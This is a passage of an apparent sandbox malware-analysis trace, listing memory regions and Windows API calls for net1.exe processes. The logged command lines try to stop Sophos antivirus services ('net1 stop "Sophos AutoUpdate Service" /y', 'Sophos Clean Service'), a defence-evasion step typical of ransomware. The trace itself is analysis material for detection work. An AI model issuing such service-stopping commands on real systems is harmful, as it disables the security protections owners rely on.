"nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 3939 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 3940 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 3941 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 3942 start_va = 0x75280000 end_va = 0x75281fff entry_point = 0x75280000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 390 os_tid = 0xcf4 [0082.121] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26fc90 | out: lpSystemTimeAsFileTime=0x26fc90*(dwLowDateTime=0xe61ec9f0, dwHighDateTime=0x1d48689)) [0082.121] GetCurrentProcessId () returned 0xd00 [0082.121] GetCurrentThreadId () returned 0xcf4 [0082.121] GetTickCount () returned 0x1e6b5 [0082.121] QueryPerformanceCounter (in: lpPerformanceCount=0x26fc98 | out: lpPerformanceCount=0x26fc98*=1812903900000) returned 1 [0082.123] GetModuleHandleW (lpModuleName=0x0) returned 0xffdd0000 [0082.123] __set_app_type (_Type=0x1) [0082.123] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xffde9c9c) returned 0x0 [0082.123] __getmainargs (in: _Argc=0xffdf4780, _Argv=0xffdf4790, _Env=0xffdf4788, _DoWildCard=0, _StartInfo=0xffdf479c | out: _Argc=0xffdf4780, _Argv=0xffdf4790, _Env=0xffdf4788) returned 0 [0082.123] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0082.123] GetConsoleOutputCP () returned 0x1b5 [0082.123] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xffdfcec0 | out: lpCPInfo=0xffdfcec0) returned 1 [0082.123] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0082.125] sprintf_s (in: _DstBuf=0x26fc38, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0082.125] setlocale (category=0, locale=".437") returned="English_United States.437" [0082.127] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0082.127] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0082.127] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop \"Sophos AutoUpdate Service\" /y" [0082.127] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x26f9d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0082.127] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0082.127] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x26fc28 | out: Buffer=0x26fc28*=0x6c0f0) returned 0x0 [0082.127] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x26fc28 | out: Buffer=0x26fc28*=0x6c110) returned 0x0 [0082.127] _fileno (_File=0x7fefdba2a80) returned 0 [0082.127] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0082.127] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0082.127] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0082.127] _wcsicmp (_String1="config", _String2="stop") returned -16 [0082.127] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0082.128] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0082.128] _wcsicmp (_String1="file", _String2="stop") returned -13 [0082.128] _wcsicmp (_String1="files", _String2="stop") returned -13 [0082.128] _wcsicmp (_String1="group", _String2="stop") returned -12 [0082.128] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0082.128] _wcsicmp (_String1="help", _String2="stop") returned -11 [0082.128] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0082.128] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0082.128] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0082.128] _wcsicmp (_String1="session", _String2="stop") returned -15 [0082.128] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0082.128] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0082.128] _wcsicmp (_String1="share", _String2="stop") returned -12 [0082.128] _wcsicmp (_String1="start", _String2="stop") returned -14 [0082.128] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0082.128] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0082.128] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0082.128] _wcsicmp (_String1="accounts", _String2="Sophos AutoUpdate Service") returned -18 [0082.128] _wcsicmp (_String1="computer", _String2="Sophos AutoUpdate Service") returned -16 [0082.128] _wcsicmp (_String1="config", _String2="Sophos AutoUpdate Service") returned -16 [0082.128] _wcsicmp (_String1="continue", _String2="Sophos AutoUpdate Service") returned -16 [0082.128] _wcsicmp (_String1="cont", _String2="Sophos AutoUpdate Service") returned -16 [0082.128] _wcsicmp (_String1="file", _String2="Sophos AutoUpdate Service") returned -13 [0082.128] _wcsicmp (_String1="files", _String2="Sophos AutoUpdate Service") returned -13 [0082.128] _wcsicmp (_String1="group", _String2="Sophos AutoUpdate Service") returned -12 [0082.128] _wcsicmp (_String1="groups", _String2="Sophos AutoUpdate Service") returned -12 [0082.128] _wcsicmp (_String1="help", _String2="Sophos AutoUpdate Service") returned -11 [0082.128] _wcsicmp (_String1="helpmsg", _String2="Sophos AutoUpdate Service") returned -11 [0082.128] _wcsicmp (_String1="localgroup", _String2="Sophos AutoUpdate Service") returned -7 [0082.128] _wcsicmp (_String1="pause", _String2="Sophos AutoUpdate Service") returned -3 [0082.128] _wcsicmp (_String1="session", _String2="Sophos AutoUpdate Service") returned -10 [0082.128] _wcsicmp (_String1="sessions", _String2="Sophos AutoUpdate Service") returned -10 [0082.128] _wcsicmp (_String1="sess", _String2="Sophos AutoUpdate Service") returned -10 [0082.128] _wcsicmp (_String1="share", _String2="Sophos AutoUpdate Service") returned -7 [0082.129] _wcsicmp (_String1="start", _String2="Sophos AutoUpdate Service") returned 5 [0082.129] _wcsicmp (_String1="stats", _String2="Sophos AutoUpdate Service") returned 5 [0082.129] _wcsicmp (_String1="statistics", _String2="Sophos AutoUpdate Service") returned 5 [0082.129] _wcsicmp (_String1="stop", _String2="Sophos AutoUpdate Service") returned 5 [0082.129] _wcsicmp (_String1="time", _String2="Sophos AutoUpdate Service") returned 1 [0082.129] _wcsicmp (_String1="user", _String2="Sophos AutoUpdate Service") returned 2 [0082.129] _wcsicmp (_String1="users", _String2="Sophos AutoUpdate Service") returned 2 [0082.129] _wcsicmp (_String1="msg", _String2="Sophos AutoUpdate Service") returned -6 [0082.129] _wcsicmp (_String1="messenger", _String2="Sophos AutoUpdate Service") returned -6 [0082.129] _wcsicmp (_String1="receiver", _String2="Sophos AutoUpdate Service") returned -1 [0082.129] _wcsicmp (_String1="rcv", _String2="Sophos AutoUpdate Service") returned -1 [0082.129] _wcsicmp (_String1="netpopup", _String2="Sophos AutoUpdate Service") returned -5 [0082.129] _wcsicmp (_String1="redirector", _String2="Sophos AutoUpdate Service") returned -1 [0082.129] _wcsicmp (_String1="redir", _String2="Sophos AutoUpdate Service") returned -1 [0082.129] _wcsicmp (_String1="rdr", _String2="Sophos AutoUpdate Service") returned -1 [0082.129] _wcsicmp (_String1="workstation", _String2="Sophos AutoUpdate Service") returned 4 [0082.129] _wcsicmp (_String1="work", _String2="Sophos AutoUpdate Service") returned 4 [0082.129] _wcsicmp (_String1="wksta", _String2="Sophos AutoUpdate Service") returned 4 [0082.129] _wcsicmp (_String1="prdr", _String2="Sophos AutoUpdate Service") returned -3 [0082.129] _wcsicmp (_String1="devrdr", _String2="Sophos AutoUpdate Service") returned -15 [0082.129] _wcsicmp (_String1="lanmanworkstation", _String2="Sophos AutoUpdate Service") returned -7 [0082.129] _wcsicmp (_String1="server", _String2="Sophos AutoUpdate Service") returned -10 [0082.129] _wcsicmp (_String1="svr", _String2="Sophos AutoUpdate Service") returned 7 [0082.129] _wcsicmp (_String1="srv", _String2="Sophos AutoUpdate Service") returned 3 [0082.129] _wcsicmp (_String1="lanmanserver", _String2="Sophos AutoUpdate Service") returned -7 [0082.129] _wcsicmp (_String1="alerter", _String2="Sophos AutoUpdate Service") returned -18 [0082.129] _wcsicmp (_String1="netlogon", _String2="Sophos AutoUpdate Service") returned -5 [0082.129] _wcsupr (in: _String="Sophos AutoUpdate Service" | out: _String="SOPHOS AUTOUPDATE SERVICE") returned="SOPHOS AUTOUPDATE SERVICE" [0082.130] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x6ce20 [0082.195] GetServiceKeyNameW (in: hSCManager=0x6ce20, lpDisplayName="SOPHOS AUTOUPDATE SERVICE", lpServiceName=0xffdf5750, lpcchBuffer=0x26fb48 | out: lpServiceName="", lpcchBuffer=0x26fb48) returned 0 [0082.196] _wcsicmp (_String1="msg", _String2="SOPHOS AUTOUPDATE SERVICE") returned -6 [0082.196] _wcsicmp (_String1="messenger", _String2="SOPHOS AUTOUPDATE SERVICE") returned -6 [0082.196] _wcsicmp (_String1="receiver", _String2="SOPHOS AUTOUPDATE SERVICE") returned -1 [0082.196] _wcsicmp (_String1="rcv", _String2="SOPHOS AUTOUPDATE SERVICE") returned -1 [0082.196] _wcsicmp (_String1="redirector", _String2="SOPHOS AUTOUPDATE SERVICE") returned -1 [0082.196] _wcsicmp (_String1="redir", _String2="SOPHOS AUTOUPDATE SERVICE") returned -1 [0082.196] _wcsicmp (_String1="rdr", _String2="SOPHOS AUTOUPDATE SERVICE") returned -1 [0082.196] _wcsicmp (_String1="workstation", _String2="SOPHOS AUTOUPDATE SERVICE") returned 4 [0082.196] _wcsicmp (_String1="work", _String2="SOPHOS AUTOUPDATE SERVICE") returned 4 [0082.196] _wcsicmp (_String1="wksta", _String2="SOPHOS AUTOUPDATE SERVICE") returned 4 [0082.196] _wcsicmp (_String1="prdr", _String2="SOPHOS AUTOUPDATE SERVICE") returned -3 [0082.196] _wcsicmp (_String1="devrdr", _String2="SOPHOS AUTOUPDATE SERVICE") returned -15 [0082.197] _wcsicmp (_String1="lanmanworkstation", _String2="SOPHOS AUTOUPDATE SERVICE") returned -7 [0082.197] _wcsicmp (_String1="server", _String2="SOPHOS AUTOUPDATE SERVICE") returned -10 [0082.197] _wcsicmp (_String1="svr", _String2="SOPHOS AUTOUPDATE SERVICE") returned 7 [0082.197] _wcsicmp (_String1="srv", _String2="SOPHOS AUTOUPDATE SERVICE") returned 3 [0082.197] _wcsicmp (_String1="lanmanserver", _String2="SOPHOS AUTOUPDATE SERVICE") returned -7 [0082.197] _wcsicmp (_String1="alerter", _String2="SOPHOS AUTOUPDATE SERVICE") returned -18 [0082.197] _wcsicmp (_String1="netlogon", _String2="SOPHOS AUTOUPDATE SERVICE") returned -5 [0082.197] NetServiceControl (in: servername=0x0, service="SOPHOS AUTOUPDATE SERVICE", opcode=0x0, arg=0x0, bufptr=0x26fb50 | out: bufptr=0x26fb50) returned 0x889 [0082.198] wcscpy_s (in: _Destination=0xffdf80d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0082.198] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75280000 [0082.198] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75280000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xffdf5b50, nSize=0x800, Arguments=0xffdf7f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0082.200] GetFileType (hFile=0xb) returned 0x2 [0082.200] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x26fa18 | out: lpMode=0x26fa18) returned 1 [0082.200] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffdf5b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x26fa10, lpReserved=0x0 | out: lpBuffer=0xffdf5b50*, lpNumberOfCharsWritten=0x26fa10*=0x1e) returned 1 [0082.201] GetFileType (hFile=0xb) returned 0x2 [0082.201] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x26fa18 | out: lpMode=0x26fa18) returned 1 [0082.201] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffdd1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x26fa10, lpReserved=0x0 | out: lpBuffer=0xffdd1efc*, lpNumberOfCharsWritten=0x26fa10*=0x2) returned 1 [0082.201] _ultow (in: _Dest=0x889, _Radix=2554496 | out: _Dest=0x889) returned="2185" [0082.202] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75280000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xffdf5b50, nSize=0x800, Arguments=0xffdf7f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0082.202] GetFileType (hFile=0xb) returned 0x2 [0082.202] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x26fa18 | out: lpMode=0x26fa18) returned 1 [0082.202] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffdf5b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x26fa10, lpReserved=0x0 | out: lpBuffer=0xffdf5b50*, lpNumberOfCharsWritten=0x26fa10*=0x34) returned 1 [0082.202] GetFileType (hFile=0xb) returned 0x2 [0082.203] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x26fa18 | out: lpMode=0x26fa18) returned 1 [0082.203] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffdd1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x26fa10, lpReserved=0x0 | out: lpBuffer=0xffdd1efc*, lpNumberOfCharsWritten=0x26fa10*=0x2) returned 1 [0082.203] NetApiBufferFree (Buffer=0x6c0f0) returned 0x0 [0082.203] NetApiBufferFree (Buffer=0x6c110) returned 0x0 [0082.203] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop \"Sophos AutoUpdate Service\" /y" [0082.203] exit (_Code=2) Process: id = "59" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x2327e000" os_pid = "0xd30" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "52" os_parent_pid = "0xfc8" cmd_line = "C:\\Windows\\system32\\net1 stop \"Sophos Clean Service\" /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3904 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 3905 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 3906 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 3907 start_va = 0x70000 end_va = 0xeffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 3908 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3909 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 3910 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3911 start_va = 0xffdd0000 end_va = 0xffe02fff entry_point = 0xffdd0000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 3912 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 3913 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 3914 start_va = 0x7fffffd4000 end_va = 0x7fffffd4fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd4000" filename = "" Region: id = 3915 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 3916 start_va = 0x150000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 3917 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3918 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 3943 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3944 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 3945 start_va = 0x130000 end_va = 0x13ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 3946 start_va = 0x250000 end_va = 0x2b6fff entry_point = 0x250000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3947 start_va = 0x2c0000 end_va = 0x3bffff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 3948 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 3949 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 3950 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 3951 start_va = 0x7fef8ed0000 end_va = 0x7fef8ee1fff entry_point = 0x7fef8ed0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 3952 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 3953 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 3954 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 3955 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 3956 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 3957 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 3958 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 3959 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 3960 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 3961 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 3962 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 3963 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 3964 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 3965 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 3966 start_va = 0x75290000 end_va = 0x75291fff entry_point = 0x75290000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 391 os_tid = 0xd44 [0082.238] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xef890 | out: lpSystemTimeAsFileTime=0xef890*(dwLowDateTime=0xe62f7390, dwHighDateTime=0x1d48689)) [0082.238] GetCurrentProcessId () returned 0xd30 [0082.238] GetCurrentThreadId () returned 0xd44 [0082.238] GetTickCount () returned 0x1e723 [0082.238] QueryPerformanceCounter (in: lpPerformanceCount=0xef898 | out: lpPerformanceCount=0xef898*=1812915700000) returned 1 [0082.240] GetModuleHandleW (lpModuleName=0x0) returned 0xffdd0000 [0082.240] __set_app_type (_Type=0x1) [0082.240] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xffde9c9c) returned 0x0 [0082.240] __getmainargs (in: _Argc=0xffdf4780, _Argv=0xffdf4790, _Env=0xffdf4788, _DoWildCard=0, _StartInfo=0xffdf479c | out: _Argc=0xffdf4780, _Argv=0xffdf4790, _Env=0xffdf4788) returned 0 [0082.240] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0082.240] GetConsoleOutputCP () returned 0x1b5 [0082.240] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xffdfcec0 | out: lpCPInfo=0xffdfcec0) returned 1 [0082.240] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0082.242] sprintf_s (in: _DstBuf=0xef838, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0082.242] setlocale (category=0, locale=".437") returned="English_United States.437" [0082.243] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0082.243] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0082.243] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop \"Sophos Clean Service\" /y" [0082.243] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xef5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0082.243] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0082.243] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0xef828 | out: Buffer=0xef828*=0x164d60) returned 0x0 [0082.243] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0xef828 | out: Buffer=0xef828*=0x16c130) returned 0x0 [0082.243] _fileno (_File=0x7fefdba2a80) returned 0 [0082.244] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0082.244] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0082.244] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0082.244] _wcsicmp (_String1="config", _String2="stop") returned -16 [0082.244] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0082.244] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0082.244] _wcsicmp (_String1="file", _String2="stop") returned -13 [0082.244] _wcsicmp (_String1="files", _String2="stop") returned -13 [0082.244] _wcsicmp (_String1="group", _String2="stop") returned -12 [0082.244] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0082.244] _wcsicmp (_String1="help", _String2="stop") returned -11 [0082.244] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0082.244] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0082.244] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0082.244] _wcsicmp (_String1="session", _String2="stop") returned -15 [0082.244] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0082.244] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0082.244] _wcsicmp (_String1="share", _String2="stop") returned -12 [0082.244] _wcsicmp (_String1="start", _String2="stop") returned -14 [0082.244] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0082.244] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0082.244] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0082.244] _wcsicmp (_String1="accounts", _String2="Sophos Clean Service") returned -18 [0082.244] _wcsicmp (_String1="computer", _String2="Sophos Clean Service") returned -16 [0082.244] _wcsicmp (_String1="config", _String2="Sophos Clean Service") returned -16 [0082.244] _wcsicmp (_String1="continue", _String2="Sophos Clean Service") returned -16 [0082.244] _wcsicmp (_String1="cont", _String2="Sophos Clean Service") returned -16 [0082.244] _wcsicmp (_String1="file", _String2="Sophos Clean Service") returned -13 [0082.244] _wcsicmp (_String1="files", _String2="Sophos Clean Service") returned -13 [0082.244] _wcsicmp (_String1="group", _String2="Sophos Clean Service") returned -12 [0082.244] _wcsicmp (_String1="groups", _String2="Sophos Clean Service") returned -12 [0082.244] _wcsicmp (_String1="help", _String2="Sophos Clean Service") returned -11 [0082.244] _wcsicmp (_String1="helpmsg", _String2="Sophos Clean Service") returned -11 [0082.244] _wcsicmp (_String1="localgroup", _String2="Sophos Clean Service") returned -7 [0082.245] _wcsicmp (_String1="pause", _String2="Sophos Clean Service") returned -3 [0082.245] _wcsicmp (_String1="session", _String2="Sophos Clean Service") returned -10 [0082.245] _wcsicmp (_String1="sessions", _String2="Sophos Clean Service") returned -10 [0082.245] _wcsicmp (_String1="sess", _String2="Sophos Clean Service") returned -10 [0082.245] _wcsicmp (_String1="share", _String2="Sophos Clean Service") returned -7 [0082.245] _wcsicmp (_String1="start", _String2="Sophos Clean Service") returned 5 [0082.245] _wcsicmp (_String1="stats", _String2="Sophos Clean Service") returned 5 [0082.245] _wcsicmp (_String1="statistics", _String2="Sophos Clean Service") returned 5 [0082.245] _wcsicmp (_String1="stop", _String2="Sophos Clean Service") returned 5 [0082.245] _wcsicmp (_String1="time", _String2="Sophos Clean Service") returned 1 [0082.245] _wcsicmp (_String1="user", _String2="Sophos Clean Service") returned 2 [0082.245] _wcsicmp (_String1="users", _String2="Sophos Clean Service") returned 2 [0082.245] _wcsicmp (_String1="msg", _String2="Sophos Clean Service") returned -6 [0082.245] _wcsicmp (_String1="messenger", _String2="Sophos Clean Service") returned -6 [0082.245] _wcsicmp (_String1="receiver", _String2="Sophos Clean Service") returned -1 [0082.245] _wcsicmp (_String1="rcv", _String2="Sophos Clean Service") returned -1 [0082.245] _wcsicmp (_String1="netpopup", _String2="Sophos Clean Service") returned -5 [0082.245] _wcsicmp (_String1="redirector", _String2="Sophos Clean Service") returned -1 [0082.245] _wcsicmp (_String1="redir", _String2="Sophos Clean Service") returned -1 [0082.245] _wcsicmp (_String1="rdr", _String2="Sophos Clean Service") returned -1 [0082.245] _wcsicmp (_String1="workstation", 